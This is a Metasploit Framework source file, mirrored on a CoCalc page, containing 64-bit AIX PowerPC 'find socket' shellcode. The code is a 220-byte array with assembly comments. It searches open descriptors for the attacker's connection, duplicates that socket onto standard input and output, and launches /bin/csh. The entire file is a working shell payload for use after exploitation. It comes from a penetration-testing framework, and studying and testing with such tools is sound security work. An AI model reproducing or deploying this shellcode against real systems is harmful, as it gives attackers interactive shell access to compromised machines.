CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/unixasm/aix-power-fndsockcode64.c
Views: 11766
1
/*
2
* $Id: aix-power-fndsockcode64.c 40 2008-11-17 02:45:30Z ramon $
3
*
4
* aix-power-fndsockcode64.c - AIX Power Find socket code
5
* Copyright 2008 Ramon de Carvalho Valle <[email protected]>
6
*
7
* This library is free software; you can redistribute it and/or
8
* modify it under the terms of the GNU Lesser General Public
9
* License as published by the Free Software Foundation; either
10
* version 2.1 of the License, or (at your option) any later version.
11
*
12
* This library is distributed in the hope that it will be useful,
13
* but WITHOUT ANY WARRANTY; without even the implied warranty of
14
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
15
* Lesser General Public License for more details.
16
*
17
* You should have received a copy of the GNU Lesser General Public
18
* License along with this library; if not, write to the Free Software
19
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
20
*
21
*/
22
23
/*
24
* Currently supported AIX levels.
25
* -DV530 AIX 5.3.0
26
*
27
*/
28
29
#define FNDSOCKPORT 106
30
31
char fndsockcode64[]= /* 220 bytes */
32
"\x7f\xff\xfa\x79" /* xor. r31,r31,r31 */
33
"\x40\x82\xff\xfd" /* bnel <fndsockcode64> */
34
"\x7f\xc8\x02\xa6" /* mflr r30 */
35
"\x3b\xde\x01\xff" /* cal r30,511(r30) */
36
"\x3b\xde\xfe\x1d" /* cal r30,-483(r30) */
37
"\x7f\xc9\x03\xa6" /* mtctr r30 */
38
"\x4e\x80\x04\x20" /* bctr */
39
"\x4c\xc6\x33\x42" /* crorc 6,6,6 */
40
"\x44\xff\xff\x02" /* svca 0 */
41
"\x3b\xde\xff\xf8" /* cal r30,-8(r30) */
42
"\x3b\xa0\x01\xff" /* lil r29,511 */
43
"\x97\xe1\xff\xfc" /* stu r31,-4(r1) */
44
"\x7c\x3c\x0b\x78" /* mr r28,r1 */
45
"\x3b\x7d\xfe\x2d" /* cal r27,-467(r29) */
46
"\x97\x61\xff\xfc" /* stu r27,-4(r1) */
47
"\x7c\x3b\x0b\x78" /* mr r27,r1 */
48
"\x3b\xff\x01\xff" /* cal r31,511(r31) */
49
"\x3b\xff\xfe\x02" /* cal r31,-510(r31) */
50
"\x7f\x65\xdb\x78" /* mr r5,r27 */
51
"\x7f\x84\xe3\x78" /* mr r4,r28 */
52
"\x7f\xe3\xfb\x78" /* mr r3,r31 */
53
#ifdef V530
54
"\x38\x5d\xfe\x7b" /* cal r2,-389(r29) */
55
#endif
56
"\x7f\xc9\x03\xa6" /* mtctr r30 */
57
"\x4e\x80\x04\x21" /* bctrl */
58
"\x3b\x5c\x01\xff" /* cal r26,511(r28) */
59
"\xa3\x5a\xfe\x03" /* lhz r26,-509(r26) */
60
"\x28\x1a\x04\xd2" /* cmpli 0,r26,1234 */
61
"\x40\x82\xff\xd4" /* bne <fndsockcode64+64> */
62
"\x3b\x3d\xfe\x03" /* cal r25,-509(r29) */
63
"\x7f\x23\xcb\x78" /* mr r3,r25 */
64
#ifdef V530
65
"\x38\x5d\xfe\xa1" /* cal r2,-351(r29) */
66
#endif
67
"\x7f\xc9\x03\xa6" /* mtctr r30 */
68
"\x4e\x80\x04\x21" /* bctrl */
69
"\x7f\x25\xcb\x78" /* mr r5,r25 */
70
"\x7c\x84\x22\x78" /* xor r4,r4,r4 */
71
"\x7f\xe3\xfb\x78" /* mr r3,r31 */
72
#ifdef V530
73
"\x38\x5d\xff\x43" /* cal r2,-189(r29) */
74
#endif
75
"\x7f\xc9\x03\xa6" /* mtctr r30 */
76
"\x4e\x80\x04\x21" /* bctrl */
77
"\x37\x39\xff\xff" /* ai. r25,r25,-1 */
78
"\x40\x80\xff\xd4" /* bge <fndsockcode64+116> */
79
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
80
"\x40\x82\xff\xfd" /* bnel <fndsockcode64+164> */
81
"\x7f\x08\x02\xa6" /* mflr r24 */
82
"\x3b\x18\x01\xff" /* cal r24,511(r24) */
83
"\x38\x78\xfe\x29" /* cal r3,-471(r24) */
84
"\x98\xb8\xfe\x31" /* stb r5,-463(r24) */
85
"\xf8\xa1\xff\xf9" /* stdu r5,-8(r1) */
86
"\xf8\x61\xff\xf9" /* stdu r3,-8(r1) */
87
"\x7c\x24\x0b\x78" /* mr r4,r1 */
88
#ifdef V530
89
"\x38\x5d\xfe\x06" /* cal r2,-506(r29) */
90
#endif
91
"\x7f\xc9\x03\xa6" /* mtctr r30 */
92
"\x4e\x80\x04\x20" /* bctr */
93
"/bin/csh"
94
;
95
96